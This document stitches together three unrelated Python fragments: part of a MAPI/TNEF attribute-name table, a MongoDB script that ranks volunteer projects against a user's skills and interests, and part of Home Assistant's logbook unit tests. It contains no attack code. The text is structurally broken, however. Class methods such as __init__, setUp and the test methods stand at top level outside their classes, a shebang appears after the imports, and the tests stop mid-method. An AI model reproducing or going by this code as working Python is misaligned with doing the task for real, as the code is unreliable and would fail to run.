MAPI_ADDRTYPE : "MAPI_ADDRTYPE",
MAPI_EMAIL_ADDRESS : "MAPI_EMAIL_ADDRESS",
MAPI_COMMENT : "MAPI_COMMENT",
MAPI_DEPTH : "MAPI_DEPTH",
MAPI_PROVIDER_DISPLAY : "MAPI_PROVIDER_DISPLAY",
MAPI_CREATION_TIME : "MAPI_CREATION_TIME",
MAPI_LAST_MODIFICATION_TIME : "MAPI_LAST_MODIFICATION_TIME",
MAPI_RESOURCE_FLAGS : "MAPI_RESOURCE_FLAGS",
MAPI_PROVIDER_DLL_NAME : "MAPI_PROVIDER_DLL_NAME",
MAPI_SEARCH_KEY : "MAPI_SEARCH_KEY",
MAPI_PROVIDER_UID : "MAPI_PROVIDER_UID",
MAPI_PROVIDER_ORDINAL : "MAPI_PROVIDER_ORDINAL",
MAPI_FORM_VERSION : "MAPI_FORM_VERSION",
MAPI_FORM_CLSID : "MAPI_FORM_CLSID",
MAPI_FORM_CONTACT_NAME : "MAPI_FORM_CONTACT_NAME",
MAPI_FORM_CATEGORY : "MAPI_FORM_CATEGORY",
MAPI_FORM_CATEGORY_SUB : "MAPI_FORM_CATEGORY_SUB",
MAPI_FORM_HOST_MAP : "MAPI_FORM_HOST_MAP",
MAPI_FORM_HIDDEN : "MAPI_FORM_HIDDEN",
MAPI_FORM_DESIGNER_NAME : "MAPI_FORM_DESIGNER_NAME",
MAPI_FORM_DESIGNER_GUID : "MAPI_FORM_DESIGNER_GUID",
MAPI_FORM_MESSAGE_BEHAVIOR : "MAPI_FORM_MESSAGE_BEHAVIOR",
MAPI_DEFAULT_STORE : "MAPI_DEFAULT_STORE",
MAPI_STORE_SUPPORT_MASK : "MAPI_STORE_SUPPORT_MASK",
MAPI_STORE_STATE : "MAPI_STORE_STATE",
MAPI_IPM_SUBTREE_SEARCH_KEY : "MAPI_IPM_SUBTREE_SEARCH_KEY",
MAPI_IPM_OUTBOX_SEARCH_KEY : "MAPI_IPM_OUTBOX_SEARCH_KEY",
MAPI_IPM_WASTEBASKET_SEARCH_KEY : "MAPI_IPM_WASTEBASKET_SEARCH_KEY",
MAPI_IPM_SENTMAIL_SEARCH_KEY : "MAPI_IPM_SENTMAIL_SEARCH_KEY",
MAPI_MDB_PROVIDER : "MAPI_MDB_PROVIDER",
MAPI_RECEIVE_FOLDER_SETTINGS : "MAPI_RECEIVE_FOLDER_SETTINGS",
MAPI_VALID_FOLDER_MASK : "MAPI_VALID_FOLDER_MASK",
MAPI_IPM_SUBTREE_ENTRYID : "MAPI_IPM_SUBTREE_ENTRYID",
MAPI_IPM_OUTBOX_ENTRYID : "MAPI_IPM_OUTBOX_ENTRYID",
MAPI_IPM_WASTEBASKET_ENTRYID : "MAPI_IPM_WASTEBASKET_ENTRYID",
MAPI_IPM_SENTMAIL_ENTRYID : "MAPI_IPM_SENTMAIL_ENTRYID",
MAPI_VIEWS_ENTRYID : "MAPI_VIEWS_ENTRYID",
MAPI_COMMON_VIEWS_ENTRYID : "MAPI_COMMON_VIEWS_ENTRYID",
MAPI_FINDER_ENTRYID : "MAPI_FINDER_ENTRYID",
MAPI_CONTAINER_FLAGS : "MAPI_CONTAINER_FLAGS",
MAPI_FOLDER_TYPE : "MAPI_FOLDER_TYPE",
MAPI_CONTENT_COUNT : "MAPI_CONTENT_COUNT",
MAPI_CONTENT_UNREAD : "MAPI_CONTENT_UNREAD",
MAPI_CREATE_TEMPLATES : "MAPI_CREATE_TEMPLATES",
MAPI_DETAILS_TABLE : "MAPI_DETAILS_TABLE",
MAPI_SEARCH : "MAPI_SEARCH",
MAPI_SELECTABLE : "MAPI_SELECTABLE",
MAPI_SUBFOLDERS : "MAPI_SUBFOLDERS",
MAPI_STATUS : "MAPI_STATUS",
MAPI_ANR : "MAPI_ANR",
MAPI_CONTENTS_SORT_ORDER : "MAPI_CONTENTS_SORT_ORDER",
MAPI_CONTAINER_HIERARCHY : "MAPI_CONTAINER_HIERARCHY",
MAPI_CONTAINER_CONTENTS : "MAPI_CONTAINER_CONTENTS",
MAPI_FOLDER_ASSOCIATED_CONTENTS : "MAPI_FOLDER_ASSOCIATED_CONTENTS",
MAPI_DEF_CREATE_DL : "MAPI_DEF_CREATE_DL",
MAPI_DEF_CREATE_MAILUSER : "MAPI_DEF_CREATE_MAILUSER",
MAPI_CONTAINER_CLASS : "MAPI_CONTAINER_CLASS",
MAPI_CONTAINER_MODIFY_VERSION : "MAPI_CONTAINER_MODIFY_VERSION",
MAPI_AB_PROVIDER_ID : "MAPI_AB_PROVIDER_ID",
MAPI_DEFAULT_VIEW_ENTRYID : "MAPI_DEFAULT_VIEW_ENTRYID",
MAPI_ASSOC_CONTENT_COUNT : "MAPI_ASSOC_CONTENT_COUNT",
MAPI_ATTACHMENT_X400_PARAMETERS : "MAPI_ATTACHMENT_X400_PARAMETERS",
MAPI_ATTACH_DATA_OBJ : "MAPI_ATTACH_DATA_OBJ",
MAPI_ATTACH_ENCODING : "MAPI_ATTACH_ENCODING",
MAPI_ATTACH_EXTENSION : "MAPI_ATTACH_EXTENSION",
MAPI_ATTACH_FILENAME : "MAPI_ATTACH_FILENAME",
MAPI_ATTACH_METHOD : "MAPI_ATTACH_METHOD",
MAPI_ATTACH_LONG_FILENAME : "MAPI_ATTACH_LONG_FILENAME",
MAPI_ATTACH_PATHNAME : "MAPI_ATTACH_PATHNAME",
MAPI_ATTACH_RENDERING : "MAPI_ATTACH_RENDERING",
MAPI_ATTACH_TAG : "MAPI_ATTACH_TAG",
MAPI_RENDERING_POSITION : "MAPI_RENDERING_POSITION",
MAPI_ATTACH_TRANSPORT_NAME : "MAPI_ATTACH_TRANSPORT_NAME",
MAPI_ATTACH_LONG_PATHNAME : "MAPI_ATTACH_LONG_PATHNAME",
MAPI_ATTACH_MIME_TAG : "MAPI_ATTACH_MIME_TAG",
MAPI_ATTACH_ADDITIONAL_INFO : "MAPI_ATTACH_ADDITIONAL_INFO",
MAPI_DISPLAY_TYPE : "MAPI_DISPLAY_TYPE",
MAPI_TEMPLATEID : "MAPI_TEMPLATEID",
MAPI_PRIMARY_CAPABILITY : "MAPI_PRIMARY_CAPABILITY",
MAPI_7BIT_DISPLAY_NAME : "MAPI_7BIT_DISPLAY_NAME",
MAPI_ACCOUNT : "MAPI_ACCOUNT",
MAPI_ALTERNATE_RECIPIENT : "MAPI_ALTERNATE_RECIPIENT",
MAPI_CALLBACK_TELEPHONE_NUMBER : "MAPI_CALLBACK_TELEPHONE_NUMBER",
MAPI_CONVERSION_PROHIBITED : "MAPI_CONVERSION_PROHIBITED",
MAPI_DISCLOSE_RECIPIENTS : "MAPI_DISCLOSE_RECIPIENTS",
MAPI_GENERATION : "MAPI_GENERATION",
MAPI_GIVEN_NAME : "MAPI_GIVEN_NAME",
MAPI_GOVERNMENT_ID_NUMBER : "MAPI_GOVERNMENT_ID_NUMBER",
MAPI_BUSINESS_TELEPHONE_NUMBER : "MAPI_BUSINESS_TELEPHONE_NUMBER",
MAPI_HOME_TELEPHONE_NUMBER : "MAPI_HOME_TELEPHONE_NUMBER",
MAPI_INITIALS : "MAPI_INITIALS",
MAPI_KEYWORD : "MAPI_KEYWORD",
MAPI_LANGUAGE : "MAPI_LANGUAGE",
MAPI_LOCATION : "MAPI_LOCATION",
MAPI_MAIL_PERMISSION : "MAPI_MAIL_PERMISSION",
MAPI_MHS_COMMON_NAME : "MAPI_MHS_COMMON_NAME",
MAPI_ORGANIZATIONAL_ID_NUMBER : "MAPI_ORGANIZATIONAL_ID_NUMBER",
MAPI_SURNAME : "MAPI_SURNAME",
MAPI_ORIGINAL_ENTRYID : "MAPI_ORIGINAL_ENTRYID",
MAPI_ORIGINAL_DISPLAY_NAME : "MAPI_ORIGINAL_DISPLAY_NAME",
MAPI_ORIGINAL_SEARCH_KEY : "MAPI_ORIGINAL_SEARCH_KEY",
MAPI_POSTAL_ADDRESS : "MAPI_POSTAL_ADDRESS",
MAPI_COMPANY_NAME : "MAPI_COMPANY_NAME",
MAPI_TITLE : "MAPI_TITLE",
MAPI_DEPARTMENT_NAME : "MAPI_DEPARTMENT_NAME",
MAPI_OFFICE_LOCATION : "MAPI_OFFICE_LOCATION",
MAPI_PRIMARY_TELEPHONE_NUMBER : "MAPI_PRIMARY_TELEPHONE_NUMBER",
MAPI_BUSINESS2_TELEPHONE_NUMBER : "MAPI_BUSINESS2_TELEPHONE_NUMBER",
MAPI_MOBILE_TELEPHONE_NUMBER : "MAPI_MOBILE_TELEPHONE_NUMBER",
MAPI_RADIO_TELEPHONE_NUMBER : "MAPI_RADIO_TELEPHONE_NUMBER",
MAPI_CAR_TELEPHONE_NUMBER : "MAPI_CAR_TELEPHONE_NUMBER",
MAPI_OTHER_TELEPHONE_NUMBER : "MAPI_OTHER_TELEPHONE_NUMBER",
MAPI_TRANSMITABLE_DISPLAY_NAME : "MAPI_TRANSMITABLE_DISPLAY_NAME",
MAPI_PAGER_TELEPHONE_NUMBER : "MAPI_PAGER_TELEPHONE_NUMBER",
MAPI_USER_CERTIFICATE : "MAPI_USER_CERTIFICATE",
MAPI_PRIMARY_FAX_NUMBER : "MAPI_PRIMARY_FAX_NUMBER",
MAPI_BUSINESS_FAX_NUMBER : "MAPI_BUSINESS_FAX_NUMBER",
MAPI_HOME_FAX_NUMBER : "MAPI_HOME_FAX_NUMBER",
MAPI_COUNTRY : "MAPI_COUNTRY",
MAPI_LOCALITY : "MAPI_LOCALITY",
MAPI_STATE_OR_PROVINCE : "MAPI_STATE_OR_PROVINCE",
MAPI_STREET_ADDRESS : "MAPI_STREET_ADDRESS",
MAPI_POSTAL_CODE : "MAPI_POSTAL_CODE",
MAPI_POST_OFFICE_BOX : "MAPI_POST_OFFICE_BOX",
MAPI_TELEX_NUMBER : "MAPI_TELEX_NUMBER",
MAPI_ISDN_NUMBER : "MAPI_ISDN_NUMBER",
MAPI_ASSISTANT_TELEPHONE_NUMBER : "MAPI_ASSISTANT_TELEPHONE_NUMBER",
MAPI_HOME2_TELEPHONE_NUMBER : "MAPI_HOME2_TELEPHONE_NUMBER",
MAPI_ASSISTANT : "MAPI_ASSISTANT",
MAPI_SEND_RICH_INFO : "MAPI_SEND_RICH_INFO",
MAPI_WEDDING_ANNIVERSARY : "MAPI_WEDDING_ANNIVERSARY",
MAPI_BIRTHDAY : "MAPI_BIRTHDAY",
MAPI_HOBBIES : "MAPI_HOBBIES",
MAPI_MIDDLE_NAME : "MAPI_MIDDLE_NAME",
MAPI_DISPLAY_NAME_PREFIX : "MAPI_DISPLAY_NAME_PREFIX",
MAPI_PROFESSION : "MAPI_PROFESSION",
MAPI_PREFERRED_BY_NAME : "MAPI_PREFERRED_BY_NAME",
MAPI_SPOUSE_NAME : "MAPI_SPOUSE_NAME",
MAPI_COMPUTER_NETWORK_NAME : "MAPI_COMPUTER_NETWORK_NAME",
MAPI_CUSTOMER_ID : "MAPI_CUSTOMER_ID",
MAPI_TTYTDD_PHONE_NUMBER : "MAPI_TTYTDD_PHONE_NUMBER",
MAPI_FTP_SITE : "MAPI_FTP_SITE",
MAPI_GENDER : "MAPI_GENDER",
MAPI_MANAGER_NAME : "MAPI_MANAGER_NAME",
MAPI_NICKNAME : "MAPI_NICKNAME",
MAPI_PERSONAL_HOME_PAGE : "MAPI_PERSONAL_HOME_PAGE",
MAPI_BUSINESS_HOME_PAGE : "MAPI_BUSINESS_HOME_PAGE",
MAPI_CONTACT_VERSION : "MAPI_CONTACT_VERSION",
MAPI_CONTACT_ENTRYIDS : "MAPI_CONTACT_ENTRYIDS",
MAPI_CONTACT_ADDRTYPES : "MAPI_CONTACT_ADDRTYPES",
MAPI_CONTACT_DEFAULT_ADDRESS_INDEX : "MAPI_CONTACT_DEFAULT_ADDRESS_INDEX",
MAPI_CONTACT_EMAIL_ADDRESSES : "MAPI_CONTACT_EMAIL_ADDRESSES",
MAPI_COMPANY_MAIN_PHONE_NUMBER : "MAPI_COMPANY_MAIN_PHONE_NUMBER",
MAPI_CHILDRENS_NAMES : "MAPI_CHILDRENS_NAMES",
MAPI_HOME_ADDRESS_CITY : "MAPI_HOME_ADDRESS_CITY",
MAPI_HOME_ADDRESS_COUNTRY : "MAPI_HOME_ADDRESS_COUNTRY",
MAPI_HOME_ADDRESS_POSTAL_CODE : "MAPI_HOME_ADDRESS_POSTAL_CODE",
MAPI_HOME_ADDRESS_STATE_OR_PROVINCE : "MAPI_HOME_ADDRESS_STATE_OR_PROVINCE",
MAPI_HOME_ADDRESS_STREET : "MAPI_HOME_ADDRESS_STREET",
MAPI_HOME_ADDRESS_POST_OFFICE_BOX : "MAPI_HOME_ADDRESS_POST_OFFICE_BOX",
MAPI_OTHER_ADDRESS_CITY : "MAPI_OTHER_ADDRESS_CITY",
MAPI_OTHER_ADDRESS_COUNTRY : "MAPI_OTHER_ADDRESS_COUNTRY",
MAPI_OTHER_ADDRESS_POSTAL_CODE : "MAPI_OTHER_ADDRESS_POSTAL_CODE",
MAPI_OTHER_ADDRESS_STATE_OR_PROVINCE : "MAPI_OTHER_ADDRESS_STATE_OR_PROVINCE",
MAPI_OTHER_ADDRESS_STREET : "MAPI_OTHER_ADDRESS_STREET",
MAPI_OTHER_ADDRESS_POST_OFFICE_BOX : "MAPI_OTHER_ADDRESS_POST_OFFICE_BOX",
MAPI_STORE_PROVIDERS : "MAPI_STORE_PROVIDERS",
MAPI_AB_PROVIDERS : "MAPI_AB_PROVIDERS",
MAPI_TRANSPORT_PROVIDERS : "MAPI_TRANSPORT_PROVIDERS",
MAPI_DEFAULT_PROFILE : "MAPI_DEFAULT_PROFILE",
MAPI_AB_SEARCH_PATH : "MAPI_AB_SEARCH_PATH",
MAPI_AB_DEFAULT_DIR : "MAPI_AB_DEFAULT_DIR",
MAPI_AB_DEFAULT_PAB : "MAPI_AB_DEFAULT_PAB",
MAPI_FILTERING_HOOKS : "MAPI_FILTERING_HOOKS",
MAPI_SERVICE_NAME : "MAPI_SERVICE_NAME",
MAPI_SERVICE_DLL_NAME : "MAPI_SERVICE_DLL_NAME",
MAPI_SERVICE_ENTRY_NAME : "MAPI_SERVICE_ENTRY_NAME",
MAPI_SERVICE_UID : "MAPI_SERVICE_UID",
MAPI_SERVICE_EXTRA_UIDS : "MAPI_SERVICE_EXTRA_UIDS",
MAPI_SERVICES : "MAPI_SERVICES",
MAPI_SERVICE_SUPPORT_FILES : "MAPI_SERVICE_SUPPORT_FILES",
MAPI_SERVICE_DELETE_FILES : "MAPI_SERVICE_DELETE_FILES",
MAPI_AB_SEARCH_PATH_UPDATE : "MAPI_AB_SEARCH_PATH_UPDATE",
MAPI_PROFILE_NAME : "MAPI_PROFILE_NAME",
MAPI_IDENTITY_DISPLAY : "MAPI_IDENTITY_DISPLAY",
MAPI_IDENTITY_ENTRYID : "MAPI_IDENTITY_ENTRYID",
MAPI_RESOURCE_METHODS : "MAPI_RESOURCE_METHODS",
MAPI_RESOURCE_TYPE : "MAPI_RESOURCE_TYPE",
MAPI_STATUS_CODE : "MAPI_STATUS_CODE",
MAPI_IDENTITY_SEARCH_KEY : "MAPI_IDENTITY_SEARCH_KEY",
MAPI_OWN_STORE_ENTRYID : "MAPI_OWN_STORE_ENTRYID",
MAPI_RESOURCE_PATH : "MAPI_RESOURCE_PATH",
MAPI_STATUS_STRING : "MAPI_STATUS_STRING",
MAPI_X400_DEFERRED_DELIVERY_CANCEL : "MAPI_X400_DEFERRED_DELIVERY_CANCEL",
MAPI_HEADER_FOLDER_ENTRYID : "MAPI_HEADER_FOLDER_ENTRYID",
MAPI_REMOTE_PROGRESS : "MAPI_REMOTE_PROGRESS",
MAPI_REMOTE_PROGRESS_TEXT : "MAPI_REMOTE_PROGRESS_TEXT",
MAPI_REMOTE_VALIDATE_OK : "MAPI_REMOTE_VALIDATE_OK",
MAPI_CONTROL_FLAGS : "MAPI_CONTROL_FLAGS",
MAPI_CONTROL_STRUCTURE : "MAPI_CONTROL_STRUCTURE",
MAPI_CONTROL_TYPE : "MAPI_CONTROL_TYPE",
MAPI_DELTAX : "MAPI_DELTAX",
MAPI_DELTAY : "MAPI_DELTAY",
MAPI_XPOS : "MAPI_XPOS",
MAPI_YPOS : "MAPI_YPOS",
MAPI_CONTROL_ID : "MAPI_CONTROL_ID",
MAPI_INITIAL_DETAILS_PANE : "MAPI_INITIAL_DETAILS_PANE",
MAPI_ID_SECURE_MIN : "MAPI_ID_SECURE_MIN",
MAPI_ID_SECURE_MAX : "MAPI_ID_SECURE_MAX"
}
# Well-known MAPI property-set GUIDs carried in TNEF streams.
# NOTE(review): the exact property sets these identify are not verifiable
# from this file — presumably Outlook named properties and the
# PSETID_Appointment set; confirm against the MS-OXPROPS reference.
OutlookGuid = '05133f00aa00da98101b450b6ed8da90'
AppointmentGuid = '46000000000000c00000000000062002'
def __init__(self, attr_type, name, data, guid):
    """Store the raw MAPI attribute fields unchanged.

    attr_type: MAPI type code of the attribute.
    name:      attribute identifier (used to look up a label in `codes`).
    data:      raw attribute payload.
    guid:      property-set GUID the attribute belongs to.
    """
    # Single tuple-unpack keeps the four field captures as one unit.
    (self.attr_type,
     self.name,
     self.data,
     self.guid) = attr_type, name, data, guid
def __str__(self):
    """Return a readable tag with the known attribute name, or UNKNOWN!."""
    label = TNEFMAPI_Attribute.codes.get(self.name, "UNKNOWN!")
    return "<ATTR: %s>" % label
|
|
import sys
import pprint
# Shared pretty-printer for debug dumps throughout this script.
pp = pprint.PrettyPrinter()
import pymongo
from pymongo import MongoClient
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 12 20:30:54 2016
@author: ryanlim, jpitts
Requirements:
- pymongo needs to be installed
- mongodb needs to be running
- brigade-matchmaker web needs to be running
(populates the users table in the brigade-matchmaker collection)
For installation instructions:
http://api.mongodb.com/python/current/installation.html
For the API:
http://api.mongodb.com/python/current/api/pymongo/collection.html
Install dependencies:
python -m pip install pymongo
Interface:
param skills_list: Skills that the user can contribute.
param skills_offered_list: Skills that the user wants to learn.
param interests_list: Interests of the user.
param goals_list: Project-related goals of the user.
@usage:
python ./db-match-algo.py client-dev/javascript,data-sci/python null housing developer,presenter
python ./db-match-algo.py data-sci null homelessness developer
python ./db-match-algo.py ruby null null developer,learner
python ./db-match-algo.py null null null leader
python ./db-match-algo.py null client-dev/javascript null null
"""
# database configuration
# NOTE(review): despite its name, `collection_name` is used as the
# *database* name on the line below (db = client[...]); individual
# collections (projects, projecttaxonomies) are accessed off `db` later.
collection_name = 'brigade-matchmaker'
client = MongoClient('localhost', 27017)
db = client[collection_name]
# load the taxonomies and attributes from the database
""" NOTE: taxn_attributes below describes the data structure used in
breaking down the hierarchy of attributes submitted by users
taxn_attributes = {
'skills': [
{name: 'server-dev', parent: 'skills', synonyms: ['back-end']},
{name: 'nodejs', parent: 'server-dev', synonyms: ['node']},
{name: 'python', parent: 'server-dev', synonyms: ['django']},
],
'interests': [
],
'goals': [
]
}
"""
# Load taxonomy documents and bucket child attributes under their root
# taxonomy (documents with parent == None are roots; children are filed
# under the most recently seen root, relying on find() returning roots
# before their children).
taxonomies = []       # root taxonomy documents (parent is None)
taxn_attributes = {}  # taxonomy name -> list of child attribute documents
taxn_name = ""

for attribute in db.projecttaxonomies.find({}):
    if attribute['parent'] is None:  # was `== None`; identity test is correct for None
        # Root node: remember it and start a fresh bucket for its children.
        taxonomies.append(attribute)
        taxn_name = attribute['name']
        taxn_attributes[taxn_name] = []
    else:
        # Child node: append under the current root. setdefault guards the
        # edge case of a child arriving before any root, which previously
        # raised KeyError on taxn_attributes[""].
        taxn_attributes.setdefault(taxn_name, []).append(attribute)
""" NOTE: projects_list below is for understanding the data structure
used in the algo (soon to reflect what is in the database)
projects_list = [
{
'id':'ux-research',
'name':'UX Research',
'interests':['all','community-organizer'],
'skills_needed':['python','javascript','html'],
'goals_needed':['developer','helper']
},
{
'id':'data-sciences',
'name':'Data Sciences',
'interests':['all'],
'skills_needed':['python'],
'goals_needed':['developer']
}
]
"""
# Load the projects list from the database, annotating each project dict
# with flattened matching fields derived from its matchingConfig:
#   interests, skills_offered(+_categories), skills_needed(+_categories),
#   goals_needed.  Category lists hold the prefix of any "cat/sub" entry.
# (matchmaking() later adds the *_total / *_matched / user_score fields.)
projects_list = []
projects_count = 0

for project in db.projects.find({}):
    cfg = project['matchingConfig']

    # interests: straight copy
    project['interests'] = list(cfg['interests'])

    # skills offered, plus their top-level categories
    # (e.g. "client-dev/javascript" -> "client-dev")
    project['skills_offered'] = list(cfg['skillsOffered'])
    project['skills_offered_categories'] = [
        offered.split("/")[0] for offered in cfg['skillsOffered']
        if "/" in offered
    ]

    # skills needed, plus their top-level categories
    project['skills_needed'] = list(cfg['skillsNeeded'])
    project['skills_needed_categories'] = [
        needed.split("/")[0] for needed in cfg['skillsNeeded']
        if "/" in needed
    ]

    # goals: straight copy
    project['goals_needed'] = list(cfg['goalsNeeded'])

    projects_list.append(project)
    projects_count += 1
# END loading projects list
def matchmaking(
        skills_list,          # targeting skills needed by project
        skills_offered_list,  # targeting skills offered by project
        interests_list,       # targeting shared interests
        goals_list,           # targeting goals needed by project
        projects=None,        # optional project list; defaults to module-level projects_list
):
    """Score each project against a user's attributes and print a ranking.

    Mutates every project dict in place, setting *_total, *_matched and
    user_score, then prints one comma-joined summary line per project in
    descending user_score order.

    Scoring: +1 per exact match in the project's needed/offered/interest/
    goal lists, +1 more when a bare category name (no "/") matches a
    project's category list.  Skills count double via the weight factors.
    """
    from operator import itemgetter

    if projects is None:
        projects = projects_list

    # weight factors: skills are prioritized over interests and goals
    skills_factor = 2
    skills_offered_factor = 2
    interests_factor = 1
    goals_factor = 1

    for project in projects:
        # reset per-user totals on the project
        project['user_score'] = 0
        project['skills_total'] = 0
        project['skills_matched'] = []
        project['skills_offered_total'] = 0
        project['skills_offered_matched'] = []
        project['interests_total'] = 0
        project['interests_matched'] = []
        project['goals_total'] = 0
        project['goals_matched'] = []

        # skills the user contributes vs. skills the project needs
        for skill in skills_list:
            if skill in project['skills_needed']:
                project['skills_total'] += 1
                project['skills_matched'].append(skill)
            # bare category name (no "/") matching a needed category
            if "/" not in skill and skill in project['skills_needed_categories']:
                project['skills_total'] += 1
                project['skills_matched'].append(skill)

        # skills the user wants to learn vs. skills the project offers
        for offering in skills_offered_list:
            if offering in project['skills_offered']:
                project['skills_offered_total'] += 1
                project['skills_offered_matched'].append(offering)
            if "/" not in offering and offering in project['skills_offered_categories']:
                project['skills_offered_total'] += 1
                # BUG FIX: the original appended `skill` here — a variable
                # leaked from the loop above (NameError when skills_list is
                # empty, wrong value otherwise).
                project['skills_offered_matched'].append(offering)

        # shared interests
        for interest in interests_list:
            if interest in project['interests']:
                project['interests_total'] += 1
                project['interests_matched'].append(interest)

        # goals the user has vs. goals the project needs
        for goal in goals_list:
            if goal in project['goals_needed']:
                project['goals_total'] += 1
                project['goals_matched'].append(goal)

        # weighted total for this user/project pairing
        project['user_score'] = (
            skills_factor * project['skills_total']
            + skills_offered_factor * project['skills_offered_total']
            + interests_factor * project['interests_total']
            + goals_factor * project['goals_total']
        )

    # print the ranking, best match first
    sorted_projects = sorted(projects, key=itemgetter('user_score'),
                             reverse=True)
    for project in sorted_projects:
        seq = (
            str(project['_id']),
            project['name'],
            str(project['user_score']),
            'skills',
            str(project['skills_total']),
            "(" + " ".join(project['skills_matched']) + ")",
            'skillsOffered',
            str(project['skills_offered_total']),
            "(" + " ".join(project['skills_offered_matched']) + ")",
            'interests',
            str(project['interests_total']),
            "(" + " ".join(project['interests_matched']) + ")",
            'goals',
            str(project['goals_total']),
            "(" + " ".join(project['goals_matched']) + ")",
        )
        print(",".join(seq))
def parse_cli_list(argv, index):
    """Return argv[index] split on commas.

    A missing argument or the literal string 'null' is treated as the
    empty string, so the result is then [''] (matching the original
    inline parsing).
    """
    value = argv[index] if (len(argv) > index and argv[index] != 'null') else ""
    return value.split(",")


# if called from command line
if __name__ == "__main__":
    skills_list = parse_cli_list(sys.argv, 1)
    skills_offered_list = parse_cli_list(sys.argv, 2)
    interests_list = parse_cli_list(sys.argv, 3)
    goals_list = parse_cli_list(sys.argv, 4)
    matchmaking(skills_list, skills_offered_list, interests_list, goals_list)
|
|
"""The tests for the logbook component."""
# pylint: disable=protected-access,too-many-public-methods
from datetime import timedelta
import unittest
from unittest.mock import patch
from homeassistant.components import sun
import homeassistant.core as ha
from homeassistant.const import (
EVENT_STATE_CHANGED, EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP,
ATTR_HIDDEN, STATE_NOT_HOME, STATE_ON, STATE_OFF)
import homeassistant.util.dt as dt_util
from homeassistant.components import logbook
from homeassistant.bootstrap import setup_component
from tests.common import mock_http_component, get_test_home_assistant
class TestComponentLogbook(unittest.TestCase):
    """Test the History component."""

    # Minimal valid logbook configuration, shared by the tests below.
    EMPTY_CONFIG = logbook.CONFIG_SCHEMA({logbook.DOMAIN: {}})
def setUp(self):
    """Setup things to be run when tests are started."""
    self.hass = get_test_home_assistant()
    mock_http_component(self.hass)
    # Mark dependencies as already set up so logbook's setup passes
    # without actually loading them.
    self.hass.config.components += ['frontend', 'recorder', 'api']
    # Patch out frontend panel registration (the frontend is mocked).
    with patch('homeassistant.components.logbook.'
               'register_built_in_panel'):
        assert setup_component(self.hass, logbook.DOMAIN,
                               self.EMPTY_CONFIG)
def tearDown(self):
    """Stop everything that was started."""
    # Shut down the test Home Assistant instance created in setUp.
    self.hass.stop()
def test_service_call_create_logbook_entry(self):
    """Test if service call create log book entry."""
    captured = []

    def capture(event):
        captured.append(event)

    self.hass.bus.listen(logbook.EVENT_LOGBOOK_ENTRY, capture)
    self.hass.services.call(logbook.DOMAIN, 'log', {
        logbook.ATTR_NAME: 'Alarm',
        logbook.ATTR_MESSAGE: 'is triggered',
        logbook.ATTR_DOMAIN: 'switch',
        logbook.ATTR_ENTITY_ID: 'switch.test_switch'
    }, True)

    # The service call fires an event; the call unblocks when listeners
    # are scheduled, so wait until they have actually run.
    self.hass.block_till_done()

    self.assertEqual(1, len(captured))
    data = captured[-1].data
    self.assertEqual('Alarm', data.get(logbook.ATTR_NAME))
    self.assertEqual('is triggered', data.get(logbook.ATTR_MESSAGE))
    self.assertEqual('switch', data.get(logbook.ATTR_DOMAIN))
    self.assertEqual('switch.test_switch',
                     data.get(logbook.ATTR_ENTITY_ID))
def test_service_call_create_log_book_entry_no_message(self):
    """Test if service call create log book entry without message."""
    captured = []

    def capture(event):
        captured.append(event)

    self.hass.bus.listen(logbook.EVENT_LOGBOOK_ENTRY, capture)
    self.hass.services.call(logbook.DOMAIN, 'log', {}, True)

    # Wait for scheduled listeners; an empty payload must not
    # produce a logbook event.
    self.hass.block_till_done()
    self.assertEqual(0, len(captured))
def test_humanify_filter_sensor(self):
    """Test humanify filter too frequent sensor values."""
    entity_id = 'sensor.bla'

    point_a = dt_util.utcnow().replace(minute=2)
    point_b = point_a.replace(minute=5)
    point_c = point_a + timedelta(minutes=logbook.GROUP_BY_MINUTES)

    event_a = self.create_state_changed_event(point_a, entity_id, 10)
    event_b = self.create_state_changed_event(point_b, entity_id, 20)
    event_c = self.create_state_changed_event(point_c, entity_id, 30)

    entries = list(logbook.humanify((event_a, event_b, event_c)))

    # a and b fall in one grouping window so only the later one
    # survives; c lies a full window away and stands alone.
    self.assertEqual(2, len(entries))
    self.assert_entry(
        entries[0], point_b, 'bla', domain='sensor', entity_id=entity_id)
    self.assert_entry(
        entries[1], point_c, 'bla', domain='sensor', entity_id=entity_id)
def test_filter_continuous_sensor_values(self):
    """Test remove continuous sensor events from logbook."""
    entity_id = 'sensor.bla'
    when = dt_util.utcnow()
    # A unit_of_measurement marks the sensor as continuous, so its
    # state changes must be dropped entirely.
    attributes = {'unit_of_measurement': 'foo'}
    event = self.create_state_changed_event(
        when, entity_id, 10, attributes)

    self.assertEqual(0, len(list(logbook.humanify((event,)))))
def test_exclude_events_hidden(self):
    """Test if events are excluded if entity is hidden."""
    hidden_entity = 'sensor.bla'
    visible_entity = 'sensor.blu'
    point_a = dt_util.utcnow()
    point_b = point_a + timedelta(minutes=logbook.GROUP_BY_MINUTES)

    hidden_event = self.create_state_changed_event(
        point_a, hidden_entity, 10, {ATTR_HIDDEN: 'true'})
    visible_event = self.create_state_changed_event(
        point_b, visible_entity, 20)

    events = logbook._exclude_events(
        (ha.Event(EVENT_HOMEASSISTANT_STOP), hidden_event, visible_event),
        self.EMPTY_CONFIG)
    entries = list(logbook.humanify(events))

    # Only the shutdown entry and the non-hidden entity remain.
    self.assertEqual(2, len(entries))
    self.assert_entry(
        entries[0], name='Home Assistant', message='stopped',
        domain=ha.DOMAIN)
    self.assert_entry(
        entries[1], point_b, 'blu', domain='sensor',
        entity_id=visible_entity)
def test_exclude_events_entity(self):
    """Test if events are filtered if entity is excluded in config."""
    excluded = 'sensor.bla'
    included = 'sensor.blu'
    point_a = dt_util.utcnow()
    point_b = point_a + timedelta(minutes=logbook.GROUP_BY_MINUTES)

    event_a = self.create_state_changed_event(point_a, excluded, 10)
    event_b = self.create_state_changed_event(point_b, included, 20)

    config = logbook.CONFIG_SCHEMA({
        ha.DOMAIN: {},
        logbook.DOMAIN: {logbook.CONF_EXCLUDE: {
            logbook.CONF_ENTITIES: [excluded, ]}}})
    events = logbook._exclude_events(
        (ha.Event(EVENT_HOMEASSISTANT_STOP), event_a, event_b), config)
    entries = list(logbook.humanify(events))

    # The excluded entity is gone; shutdown entry and the other
    # entity survive.
    self.assertEqual(2, len(entries))
    self.assert_entry(
        entries[0], name='Home Assistant', message='stopped',
        domain=ha.DOMAIN)
    self.assert_entry(
        entries[1], point_b, 'blu', domain='sensor', entity_id=included)
def test_exclude_events_domain(self):
    """Test if events are filtered if domain is excluded in config."""
